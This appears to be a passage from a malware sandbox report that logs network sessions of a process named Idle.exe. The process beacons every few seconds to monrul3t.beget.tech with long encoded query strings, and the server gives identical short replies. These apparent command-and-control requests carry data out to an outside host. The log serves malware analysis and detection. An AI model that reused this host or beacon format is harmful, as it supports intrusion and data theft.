                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            29192.168.2.4539375.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:58.733536959 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulENBp2T4FlaPJTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:59.485311031 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            30192.168.2.4539385.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:04.574079990 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMBp2T1UkaPFTRqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:05.287916899 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            31192.168.2.4539395.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:10.309047937 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulkMFp2T4FkaPBTRqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:11.064337969 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            32192.168.2.4539405.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:16.074358940 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEeVp2T6lkaPhXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:10:16.847018957 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            33192.168.2.4539415.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:21.857414961 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulkMBp2Tx0kaPpXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:22.655172110 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            34192.168.2.4539425.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:27.667526960 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMBp2Tz0kaPlXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:28.415582895 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            35192.168.2.4539435.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:33.433279037 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMRp2TyUkaPNTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:10:34.193864107 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            36192.168.2.4539445.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:39.214437962 CET2947OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=QX9JiI6ICNmNGOkRzYlFjZzQjM1QzY0M2N0QWOzYTO2kTY2AzNkJCLiczNlVGO4EDMwQWOkFDN5Y2M0UTYyYDNzQjYyImY5YjN3kDZzEjY0gjI6ISZ2EGO1kzY5EGZjZ2M1YmM2UWMjZTY5ADNyQWOjJmYjJCLiQzY5UzNyEDOxcDO5gjZkJWM2MGO0cDM3YzY5EGOhRTOkRWNjhjNwIjI6ICNkhzMxUmYzUDM5cDZilzMhdzYlNGNxEWNwQGZmN2YhJyes0nI5EjbJhXSq9EMJp2T3FkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:39.949934006 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            37192.168.2.4539455.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
